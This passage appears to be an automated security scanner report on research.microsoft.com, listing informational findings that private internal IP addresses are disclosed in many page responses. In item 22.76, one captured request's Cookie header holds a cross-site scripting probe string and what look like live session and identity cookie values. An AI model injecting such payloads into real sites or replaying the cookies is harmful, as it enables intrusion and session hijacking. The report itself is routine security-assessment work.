GET /apps/search/videosearch.ashx? HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.22. http://research.microsoft.com/apps/video/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/video/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /apps/video/default.aspx?id=103780 HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.23. http://research.microsoft.com/apps/video/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/video/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /apps/video/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.24. http://research.microsoft.com/en-us/about/awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/awards.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.25. http://research.microsoft.com/en-us/about/brochure-1.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-1.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.26. http://research.microsoft.com/en-us/about/brochure-2.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-2.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/about/brochure-2.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.27. http://research.microsoft.com/en-us/about/brochure-3.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-3.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/about/brochure-3.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.28. http://research.microsoft.com/en-us/about/brochure-4.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-4.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/about/brochure-4.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.29. http://research.microsoft.com/en-us/about/brochure-5.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-5.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/about/brochure-5.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.30. http://research.microsoft.com/en-us/about/brochure-6.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-6.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/about/brochure-6.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.31. http://research.microsoft.com/en-us/about/brochure-7.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-7.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/about/brochure-7.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.32. http://research.microsoft.com/en-us/about/brochure-8.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-8.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/about/brochure-8.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.33. http://research.microsoft.com/en-us/about/brochure-9.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-9.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/about/brochure-9.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.34. http://research.microsoft.com/en-us/about/contactus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/contactus.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/about/contactus.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.35. http://research.microsoft.com/en-us/about/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/about/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.36. http://research.microsoft.com/en-us/about/directors.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/directors.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.37. http://research.microsoft.com/en-us/about/feature/downloads.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/feature/downloads.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/about/feature/downloads.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.38. http://research.microsoft.com/en-us/about/paperawards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/paperawards.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/about/paperawards.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.39. http://research.microsoft.com/en-us/collaboration/about/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/about/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/collaboration/about/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.40. http://research.microsoft.com/en-us/collaboration/about/events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/about/events.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/collaboration/about/events.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.41. http://research.microsoft.com/en-us/collaboration/about/projects.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/about/projects.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/collaboration/about/projects.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.42. http://research.microsoft.com/en-us/collaboration/about/summits.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/about/summits.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/collaboration/about/summits.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.43. http://research.microsoft.com/en-us/collaboration/awards/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/awards/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.44. http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/awards/fellows-women.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.45. http://research.microsoft.com/en-us/collaboration/awards/fellowships.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/awards/fellowships.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/collaboration/awards/fellowships.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.46. http://research.microsoft.com/en-us/collaboration/awards/opportunities.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/awards/opportunities.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.47. http://research.microsoft.com/en-us/collaboration/bg_txt.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/bg_txt.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.48. http://research.microsoft.com/en-us/collaboration/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.49. http://research.microsoft.com/en-us/collaboration/focus/cs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/focus/cs/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/collaboration/focus/cs/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.50. http://research.microsoft.com/en-us/collaboration/focus/e3/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/focus/e3/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/collaboration/focus/e3/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.51. http://research.microsoft.com/en-us/collaboration/focus/education/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/focus/education/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.52. http://research.microsoft.com/en-us/collaboration/focus/escience/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/focus/escience/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.53. http://research.microsoft.com/en-us/collaboration/focus/health/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/focus/health/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.54. http://research.microsoft.com/en-us/collaboration/focus/nui/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/focus/nui/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/collaboration/focus/nui/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.55. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/asia-pacific/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.56. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/awards-asia-pacific.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/asia-pacific/talent/awards-asia-pacific.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.57. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/mstc.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/asia-pacific/talent/mstc.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.58. http://research.microsoft.com/en-us/collaboration/global/europe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/europe/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.59. http://research.microsoft.com/en-us/collaboration/global/europe/europe-awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/europe/europe-awards.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.60. http://research.microsoft.com/en-us/collaboration/global/india/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/india/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.61. http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/india/india-awards.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.62. http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/india/phdfellowships.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.63. http://research.microsoft.com/en-us/collaboration/global/latam/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/latam/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.64. http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/latam/latam-awards.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.65. http://research.microsoft.com/en-us/collaboration/global/me-africa/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/me-africa/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.66. http://research.microsoft.com/en-us/collaboration/global/northam/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/northam/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.67. http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/northam/northam-awards.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.68. http://research.microsoft.com/en-us/collaboration/institutes/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/institutes/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/collaboration/institutes/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.69. http://research.microsoft.com/en-us/collaboration/tools/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/tools/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/collaboration/tools/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.70. http://research.microsoft.com/en-us/community/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/community/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/community/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.71. http://research.microsoft.com/en-us/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.72. http://research.microsoft.com/en-us/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.73. http://research.microsoft.com/en-us/events/escience2011/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/events/escience2011/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/events/escience2011/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.74. http://research.microsoft.com/en-us/events/indiaschooljune2011/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/events/indiaschooljune2011/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/events/indiaschooljune2011/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.75. http://research.microsoft.com/en-us/events/women-in-computing2011/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/events/women-in-computing2011/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/events/women-in-computing2011/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.76. http://research.microsoft.com/en-us/jobs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/jobs/default.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/labs/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DWorldwide%252520Locations%252520-%252520Microsoft%252520Research%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1030%2526ot%253DA

Response

22.77. http://research.microsoft.com/en-us/jobs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.78. http://research.microsoft.com/en-us/jobs/fulltime/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/fulltime/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/jobs/fulltime/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.79. http://research.microsoft.com/en-us/jobs/fulltime/researcher.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/fulltime/researcher.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/jobs/fulltime/researcher.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.80. http://research.microsoft.com/en-us/jobs/intern/about_asia-pacific.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/about_asia-pacific.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/jobs/intern/about_asia-pacific.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.81. http://research.microsoft.com/en-us/jobs/intern/about_ca.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/about_ca.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/jobs/intern/about_ca.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.82. http://research.microsoft.com/en-us/jobs/intern/about_india.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/about_india.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/jobs/intern/about_india.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.83. http://research.microsoft.com/en-us/jobs/intern/about_uk.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/about_uk.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/jobs/intern/about_uk.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.84. http://research.microsoft.com/en-us/jobs/intern/about_wa.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/about_wa.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/jobs/intern/about_wa.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.85. http://research.microsoft.com/en-us/jobs/intern/cmic.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/cmic.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/jobs/intern/cmic.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.86. http://research.microsoft.com/en-us/jobs/intern/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/jobs/intern/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.87. http://research.microsoft.com/en-us/jobs/intern/russia.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/russia.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/jobs/intern/russia.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

